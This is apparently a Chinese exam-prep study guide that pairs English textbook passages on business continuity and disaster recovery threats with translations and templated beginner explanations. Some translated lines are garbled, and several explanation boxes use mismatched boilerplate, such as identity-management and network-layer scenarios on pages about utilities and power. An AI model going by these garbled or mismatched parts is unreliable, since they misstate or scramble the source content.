If you conduct operations in an area in close proximity to an active or dormant volcano, your DRP should probably address this eventuality. Other localized natural occurrences include monsoons in Asia, tsunamis in the South Pacific, avalanches in mountainous regions, and mudslides in the western United States. If your business is geographically diverse, it is prudent to include local emergency response experts on your planning team. At the very least, make use of local resources such as government emergency preparedness teams, civil defense organizations, and insurance claim offices to help guide your efforts.

These organizations possess a wealth of knowledge and are usually more than happy to help you prepare your organization for the unexpected— after all, every organization that successfully weathers a natural disaster is one less organization that requires a portion of their valuable recovery resources after disaster strikes. Human-Made Disasters Our advanced civilization has become increasingly dependent on complex interactions between technological, logistical, and natural systems. The same complex interactions that make our sophisticated society possible also present a number of potential vulnerabilities from both intentional and unintentional human-made disasters.

In the following sections, we'll examine a few of the more common disasters to help you analyze your organization's vulnerabilities when preparing a business continuity plan and disaster recovery plan. Fires Earlier in the chapter, we explained how some regions of the world are susceptible to wildfires during the warm season, and these types of fires can COVID‑19

中文直译 / 整理

可能并不频繁,但这种风险的严重性要求进行周密规划,包括制 定业务在大流行应对模式下如何运营的应急计划,以及何种类型的保险可能 或不可能在大流行期间提供保障。 其他自然事件 世界上某些地区容易发生局部类型的自然灾害。 在BCP/DRP过程中,您的评估 团队应分析贵组织所有运营地点,并评估此类事件可能对业务造成的影响。 例 如,世界上许多地区都面临火山喷发的风险。 如果您在靠近活跃或休眠火山的 区域开展业务,您的DRP应可能涵盖这一可能性。 其他局部自然灾害包括亚洲 的季风、南太平洋的海啸、山区的雪崩,以及美国西部的泥石流。 如果您的业务具有地理多样性,那么在规划团队中纳入当地应急响应专家是明 智之举。 至少,应利用当地资源,如政府应急准备团队、民防组织和保险理赔 办公室,以帮助指导您的工作。 这些组织拥有丰富的知识,通常非常乐意协助 您为突发事件做好准备——毕竟,每一个成功应对自然灾害的组织,都意味着 灾难发生后少一个需要消耗其宝贵恢复资源的组织。 人为灾难 我们的先进文明越来越依赖于技术、物流和自然系统之间的复杂互动。 这些使 我们复杂社会成为可能的同样复杂互动,也带来了来自故意和非故意的人为灾 难的多种潜在脆弱性。

在以下章节中,我们将探讨一些更常见的灾难,以帮助 您在制定业务连续性计划和灾难恢复计划时分析贵组织的脆弱性。 火灾 在本章前面的部分,我们解释了世界某些地区在温暖季节容易发生野火,这类火 灾可以

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 11 / PDF P1227

第 1227 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

be described as natural disasters. Many smaller-scale fires result from human action—be it carelessness, faulty electrical wiring, improper fire protection practices, arson, or other reasons. Studies from the Insurance Information Institute indicate that there are at least 1,000 building fires in the United States every day. If such a fire strikes your organization, do you have the proper preventive measures in place to quickly contain it? If the fire destroys your facilities, how quickly does your disaster recovery plan allow you to resume operations elsewhere?

Acts of Terrorism Since the terrorist attacks on September 11, 2001, businesses are increasingly concerned about risks posed by terrorist threats. These attacks caused many small businesses to fail because they did not have business continuity/disaster recovery plans in place that were adequate to ensure their continued viability. Many larger businesses experienced significant losses that caused severe long-term damage. The Insurance Information Institute issued a study one year after the attacks that estimated the total damage from the attacks in New York City at $40 billion (yes, that's with a B again).

General business insurance may not properly cover an organization against acts of terrorism. In years past, most policies either covered acts of terrorism or didn't mention them explicitly. After suffering catastrophic terrorism-related losses, many insurance companies responded by amending policies to exclude losses from terrorist activity. Policy riders and endorsements are sometimes available, but often at extremely high cost. If your business continuity or disaster recovery plan includes insurance as a means of financial recovery (as it probably should!), you'd be well advised to check your policies and contact your insurance professionals to ensure that you're still covered.

Terrorist acts pose a unique challenge to DRP teams because of their unpredictable nature. Prior to the September 11, 2001, terrorist attacks, few DRP teams considered the threat of an airplane crashing into their corporate headquarters significant enough to merit mitigation. Many companies are asking themselves a number of “what if” questions regarding terrorist activity. In general, these questions are healthy because they promote dialogue between business elements regarding potential threats. On the other

中文直译 / 整理

被描述为自然灾害。 许多小规模火灾源于人为因素——无论是疏忽、电气线路 故障、不当的防火措施、纵火还是其他原因。 保险信息研究所的研究表明,美 国每天至少发生1,000起建筑火灾every day。 如果此类火灾波及您的组织,您 是否已采取适当的预防措施以迅速控制火势? 如果火灾摧毁了您的设施,您的 灾难恢复计划能否让您迅速在其他地方恢复运营? 恐怖主义行为 自2001年9月11日恐怖袭击以来,企业越来越关注恐怖威胁带来的风险。 这些袭 击导致许多中小企业倒闭,原因是它们没有制定足够完善的业务连续性/灾难恢 复计划以确保持续运营。 许多大型企业遭受了重大损失,造成了严重的长期损 害。 保险信息研究所在袭击发生一年后发布了一项研究,估算纽约市的袭击总 损失达400亿美元(是的,那个<B>B</B>没错)。 一般商业保险可能无法充分保障组织免受恐怖主义行为的影响。 过去, 大多数保单要么明确涵盖恐怖主义行为,要么未明确提及。 在遭受灾难性的 恐怖主义相关损失后,许多保险公司通过修改保单排除恐怖活动造成的损失 来应对。 有时可提供附加条款或特别约定,但通常费用极高。

如果您的业务 连续性或灾难恢复计划包含保险作为财务恢复手段(这很可能应该是! ), 则建议您仔细检查保单并联系您的保险专业人士,以确保您仍处于保障范围 内。 恐怖袭击行为因其不可预测性,对灾难恢复计划(DRP)团队构成了独特挑战。 在2001年9月11日恐怖袭击事件发生之前,很少有DRP团队认为飞机撞入公司 总部的威胁足够严重,值得采取缓解措施。 许多公司正在就恐怖活动提出一系 列“如果发生⋯⋯怎么办”的问题。 一般来说,这些问题是有益的,因为它们 促进了业务部门之间关于潜在威胁的对话。 在

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1227 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

日志要保护完整性、时间同步和访问控制。

RTO 是多久恢复,RPO 是能丢多少数据。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 12 / PDF P1228

第 1228 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

hand, disaster recovery planners must emphasize solid risk-management principles and ensure that resources aren't overallocated to terrorist threats to the detriment of other DRP/BCP activities that protect against more likely threats. Bombings/Explosions Explosions can result from a variety of human-made occurrences. Explosive gases from leaks might fill a room/building and later ignite and cause a damaging blast. In many areas, bombings are also cause for concern. From a disaster planning perspective, the effects of bombings and explosions are like those caused by a large-scale fire.

However, planning to avoid the impact of a bombing is much more difficult and relies on the physical security measures we covered in Chapter 10, “Physical Security Requirements.” Power Outages Even the most basic disaster recovery plan contains provisions to deal with the threat of a short power outage. Critical business systems are often protected by uninterruptible power supply (UPS) devices to keep them running at least long enough to shut down or long enough to get emergency generators up and working. Even so, could your organization keep operating during a sustained power outage? After Hurricane Harvey made landfall in 2017, millions of people in Texas lost power.

Similar power outages occurred in 2020 in response to the California wildfires. Does your business continuity plan include provisions to keep your business viable during a prolonged period without power? If so, what is your planning horizon? Do you need enough fuel and other supplies to last for 48 hours? Seven days? Does your disaster recovery plan make ample preparations for the timely restoration of power even if the commercial power grid remains unavailable? All of these decisions should be made based on the requirements in your business continuity and disaster recovery plans.

中文直译 / 整理

另一方面,灾难恢复规划者必须强调坚实的风险管理原则,确保资源不会过度 分配给恐怖威胁,而忽视了其他更能防范更可能发生威胁的DRP/BCP活动。 爆炸/爆炸事件 爆炸可能由多种人为事件引发。 泄漏的易燃气体可能充满房间或建筑物,随后 点燃并造成破坏性爆炸。 在许多地区,爆炸袭击也令人担忧。 从灾难规划的角 度来看,爆炸和爆炸事件的影响类似于大规模火灾造成的后果。 然而,预防爆 炸袭击的影响要困难得多,依赖于我们在第10章中介绍的物理安全措施。 停电 即使是最基本的灾难恢复计划,也包含应对短期停电威胁的措施。 关键业务 系统通常由不间断电源(UPS)设备保护,以确保其至少能运行足够长的时 间来安全关闭,或直到应急发电机启动并运行。 即便如此,您的组织在持续 停电期间能否继续运营? 2017年飓风哈维登陆后,德克萨斯州数百万人断电。 2020年加利福尼亚野火期 间也发生了类似的停电事件。 您的业务连续性计划是否包含在长时间断电期间 维持业务运营的措施? 如果是,您的规划周期是多长? 您是否需要足够的燃料 和其他物资来维持48小时? 七天? 您的灾难恢复计划是否为在商业电网仍不可 用的情况下及时恢复电力做了充分准备?

所有这些决策都应基于您的业务连续 性和灾难恢复计划中的要求。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1228 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 13 / PDF P1229

第 1229 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Check your UPSs regularly. These critical devices are often overlooked until they become necessary. Many UPSs contain self-testing mechanisms that report problems automatically, but it's still a good idea to subject them to regular testing. Also, be sure to audit the number and type of devices plugged into each UPS. It's amazing how many people think it's okay to add “just one more system” to a UPS, and you don't want to be surprised when the device can't handle the load during a real power outage!

Today's technology-driven organizations depend increasingly on electric power, so your BCP/DRP team should consider provisioning alternative power sources that can run business systems for an extended period of time. An adequate backup generator could make a huge difference when the survival of your business is at stake. Network, Utility, and Infrastructure Failures When planners consider the impact that utility outages may have on their organizations, they naturally think first about the impact of a power outage. However, keep other utilities in mind, too. Do any of your critical business systems rely on water, sewers, natural gas, or other utilities?

Also consider regional infrastructure such as highways, airports, and railroads. Any of these systems can suffer failures that might not be related to weather or other conditions described in this chapter. Many businesses depend on one or more of these infrastructure elements to move people or materials. Their failure can paralyze your business's ability to continue functioning. You must also think about your internet connectivity as a utility service. Do you have sufficient redundancy in your connectivity options to survive or recover quickly from a disaster? If you have redundant providers, do they have any single points of failure?

For example, do they both enter your building in a single fiber conduit that could be severed? If there are no alternative fiber ingress points, can you supplement a fiber connection with wireless connectivity? Do your alternate processing sites have sufficient network capacity to carry the full burden of operations in the event of a disaster?

中文直译 / 整理

定期检查您的UPS设备。 这些关键设备常常被忽视,直到需要时才被想 起。 许多UPS内置自检机制,可自动报告问题,但定期进行测试仍然是个好 主意。 同时,请务必审计每个UPS上连接的设备数量和类型。 令人惊讶的是, 仍有大量人认为在UPS上再增加“一个系统”是可以接受的,而您不希望在 真实断电时发现设备无法承受负载! 当今以技术为导向的组织越来越依赖电力,因此您的业务连续性计划/灾难恢 复计划团队应考虑配备能够长时间运行业务系统的备用电源。 在企业生存面临 威胁时,一台充足的备用发电机可能起到巨大作用。 网络、公用事业和基础设施故障 当规划者考虑公用事业中断对组织的影响时,他们自然首先想到停电的影响。 然而,也要考虑其他公用事业。 您的关键业务系统是否依赖于水、污水、天然 气或其他公用事业? 还要考虑区域基础设施,如高速公路、机场和铁路。 这些 系统中的任何一个都可能发生故障,而这些故障可能与本章所述的天气或其他 条件无关。 许多企业依赖一个或多个这些基础设施元素来运输人员或物资。 它 们的故障会使您的业务无法继续运作。 您还必须将您的互联网连接视为一种公共服务。

您的连接选项是否具有足够 的冗余,以在灾难发生时维持运营或快速恢复? 如果您拥有冗余的提供商, 它们是否存在单点故障? 例如,它们是否都通过同一根光纤管道进入您的大 楼,而该管道可能被切断? 如果没有其他光纤接入点,您能否用无线连接来 补充光纤连接? 您的备用处理站点是否具有足够的网络容量,以在灾难发生 时承担全部运营负荷?

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1229 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 14 / PDF P1230

第 1230 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

If you quickly answered “no” to the question whether you have critical business systems that rely on water, sewers, natural gas, or other utilities, think again. Do you consider people a critical business system? If a major storm knocks out the water supply to your facilities and you need to keep those facilities up and running, can you supply your employees with enough drinking water to meet their needs? What about your fire protection systems? If any of them are water-based, is there a holding tank system in place that contains ample water to extinguish a serious building fire if the public water system is unavailable?

Fires often cause serious damage in areas ravaged by storms, earthquakes, and other disasters that might also interrupt the delivery of water. Hardware/Software Failures Like it or not, computer systems fail. Hardware components simply wear out and refuse to continue performing, or they suffer physical damage. Software systems contain bugs or fall prey to improper or unexpected inputs. For this reason, BCP/DRP teams must provide adequate redundancy in their systems.

If zero downtime is a mandatory requirement, one solution is to use fully redundant failover servers in separate locations attached to separate communications links and infrastructures (also designed to operate in a failover mode). If one server is damaged or destroyed, the other will instantly take over the processing load. For more information on this concept, see the section “Remote Mirroring,” later in this chapter. Because of financial constraints, it isn't always feasible to maintain fully redundant systems. In those circumstances, the BCP/DRP team should address how replacement parts can be quickly obtained and installed.

As many parts as possible should be kept in a local parts inventory for quick replacement; this is especially true for hard-to-find parts that must otherwise be shipped in. After all, how many organizations could do without telephones for three days while a critical private branch exchange (PBX) component is en route from an overseas location to be installed on-site?

中文直译 / 整理

如果您对“您的关键业务系统是否依赖于水、污水、天然气或其他公用 设施”这一问题迅速回答了“否”,请重新思考。 您是否将人员视为关键业 务系统? 如果一场重大风暴导致您的设施供水中断,而您需要保持这些设施 正常运行,您能否为员工提供足够的饮用水以满足其需求? 您的消防系统如何? 如果其中任何系统是水基的,是否配备了储水系统, 能够在公共供水系统中断时提供充足水量以扑灭严重的建筑火灾? 火灾常 常在遭受风暴、地震及其他灾难破坏的地区造成严重损失,而这些灾难也 可能导致供水中断。 硬件/软件故障 无论是否愿意,计算机系统都会发生故障。 硬件组件会因磨损而停止工作,或 遭受物理损坏。 软件系统则可能包含漏洞,或因不当或意外输入而失效。 因此, 业务连续性计划/灾难恢复计划团队必须在其系统中提供足够的冗余。 如果零停 机是强制性要求,一种解决方案是使用位于不同位置、连接独立通信链路和基 础设施(同样设计为故障切换模式)的完全冗余故障切换服务器。 当一台服务 器受损或被毁时,另一台会立即接管处理负载。 有关此概念的更多信息,请参 见本章后续的“远程镜像”部分。 由于财务限制,维持完全冗余的系统并不总是可行的。

在这种情况下, BCP/DRP团队应解决如何快速获取和安装替换部件的问题。 尽可能多的部件应 存放在本地备件库存中,以便快速更换; 对于难以找到的部件,这一点尤其重 要,因为这些部件 otherwise 必须从外地运输。 毕竟,有多少组织能在关键的 专用交换机(PBX)组件从海外运抵现场安装的三天内,没有电话可用呢?

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1230 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 15 / PDF P1231

第 1231 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

NYC Blackout On August 14, 2003, the lights went out in New York City and in large areas of the northeastern and midwestern United States when a series of cascading failures caused the collapse of a major power grid. Fortunately, security professionals in the New York area were ready. Many businesses had already updated their disaster recovery plans and took steps to ensure their continued operations in the wake of a disaster. This blackout served to test those plans, and many organizations were able to continue operating on alternate power sources or to transfer control seamlessly to off-site data-processing centers.

Although this blackout occurred at the turn of the century, the lessons learned still offer insight for BCP/DRP teams around the world today. The lessons we continue to take away today include the following: Ensure that alternate processing sites are far enough away from your main site that they are unlikely to be affected by the same disaster. Remember that threats to your organization are both internal and external. Your next disaster may come from a terrorist attack, a building fire, or malicious code running loose on your network. Take steps to ensure that your alternate sites are segregated from the main facility to protect against all of these threats.

Disasters don't usually come with advance warning. If real-time operations are critical to your organization, be sure that your backup sites are ready to assume primary status at a moment's notice. Strikes/Picketing When designing your business continuity and disaster recovery plans, don't forget about the importance of the human factor in emergency planning. One form of human-made disaster that is often overlooked is the possibility of a strike or other labor crisis. If a large number of your employees walk out at the same time, what impact would that have on your business? How long

中文直译 / 整理

纽约大停电 2003年8月14日,由于一系列连锁故障导致主要电网崩溃,纽约市以及美 国东北部和中西部广大地区的灯光熄灭。 幸运的是,纽约地区的安全专业人员已做好准备。 许多企业已经更新了灾 难恢复计划,并采取措施确保在灾难发生后能够持续运营。 此次停电检验 了这些计划,许多组织能够依靠备用电源继续运营,或无缝将控制权转移 至异地数据处理中心。 尽管此次停电发生在世纪之交,但从中汲取的教训至今仍为全球的 BCP/DRP团队提供宝贵启示。 我们今天仍需铭记的教训包括以下几点: 确保备用 processin g sites are far enou gh awa y from your 主站点,它们不太可能受到同一灾难的影响。 请记住,对您组织的威胁既来自内部,也 来自外部。 您的下一次灾难可能来自恐怖袭击、 建筑物火灾,或在网络中肆虐的恶意代码。 采取措施确保您的备用站点 与主设施隔离,以防范所有这些威胁。 灾难通常不会提前预警。 如果实时 o p操作对 y我们的或g组织 , 确保 y我们的备份 站点随时准备接管主要角色。 罢工/示威 在制定业务连续性和灾难恢复计划时,不要忽视人为因素在应急规划中的重要 性。

一种常被忽视的人为灾难是罢工或其他劳工危机的可能性。 如果大量员工 同时离职,这对您的业务会产生什么影响? 多久

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1231 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 16 / PDF P1232

第 1232 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

would you be able to sustain operations without the regular full-time employees that staff a certain area? Your BCP and DRP teams should address these concerns and provide alternative plans should a labor crisis occur. Labor issues normally fall outside the purview of cybersecurity teams, offering a great example of an issue that should be included in a disaster recovery plan but requires input and leadership from other business functions, such as human resources and operations. Theft/Vandalism Earlier, we talked about the threat that terrorist activities pose to an organization. Theft and vandalism represent the same kind of threat on a much smaller scale.

In most cases, however, there's a far greater chance that your organization will be affected by theft or vandalism than by a terrorist attack. The theft or destruction of a critical infrastructure component, such as scrappers stealing copper wires or vandals destroying sensors, can negatively impact critical business functions. Insurance provides some financial protection against these events (subject to deductibles and limitations of coverage), but acts of this kind can cause serious damage to your business, on both a short-term and a long-term basis.

Your business continuity and disaster recovery plans should include adequate preventive measures to control the frequency of these occurrences as well as contingency plans to mitigate the effects theft and vandalism have on ongoing operations. Theft of infrastructure is becoming increasingly common as scrappers target copper in air-conditioning systems, plumbing, and power subsystems. It's a common mistake to assume that fixed infrastructure is unlikely to be a theft target.

中文直译 / 整理

您能在没有常规全职员工支持特定区域的情况下维持运营? 您的BCP和DRP团 队应解决这些问题,并在发生劳工危机时提供替代方案。 劳工问题通常不属于 网络安全团队的职责范围,这很好地说明了应当纳入灾难恢复计划但需要人力 资源和运营等其他业务部门提供意见和领导的问题。 盗窃/破坏 之前,我们讨论了恐怖活动对组织构成的威胁。 盗窃和破坏则是以小得多的规 模带来类似的威胁。 然而,在大多数情况下,您的组织遭受盗窃或破坏的可能 性远大于遭受恐怖袭击的可能性。 关键基础设施组件的被盗或破坏,例如废品 回收者偷窃铜线或破坏者摧毁传感器,可能会对关键业务功能造成负面影响。 保险可在一定程度上为这些事件提供财务保障(需扣除免赔额并受保障范围限 制),但此类行为可能对您的业务造成短期和长期的严重损害。 您的业务连续 性和灾难恢复计划应包含充分的预防措施,以控制此类事件的发生频率,并制 定应急计划,以减轻盗窃和破坏对日常运营的影响。 随着废品回收者瞄准空调系统、管道和电力子系统中的铜材,基础设 施盗窃正变得越来越普遍。 错误地认为固定基础设施不太可能成为盗窃目 标是一种常见误区。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1232 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 17 / PDF P1233

第 1233 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Off-site Challenges to Security The constant threat of theft and vandalism is the bane of information security professionals worldwide. Personally identifiable information, proprietary or trade secrets, and other forms of confidential data are just as interesting to those who create and possess them as they are to direct competitors and other unauthorized parties. Here's an example. Aaron knows the threats to confidential data firsthand, working as a security officer for a prominent and highly visible computing enterprise. His chief responsibility is to keep sensitive information from exposure to various elements and entities.

Bethany is one of his more troublesome employees because she's constantly taking her notebook computer offsite without properly securing its contents. Even a casual smash-and-grab theft attempt could put thousands of client contacts and their confidential business dealings at risk of being leaked and possibly sold to malicious parties. Aaron knows the potential dangers, but Bethany just doesn't seem to care. This poses the question: How might you better inform, train, or advise Bethany so that Aaron does not have to relieve her of her position should her notebook be stolen? Bethany must come to understand and appreciate the importance of keeping sensitive information secure.

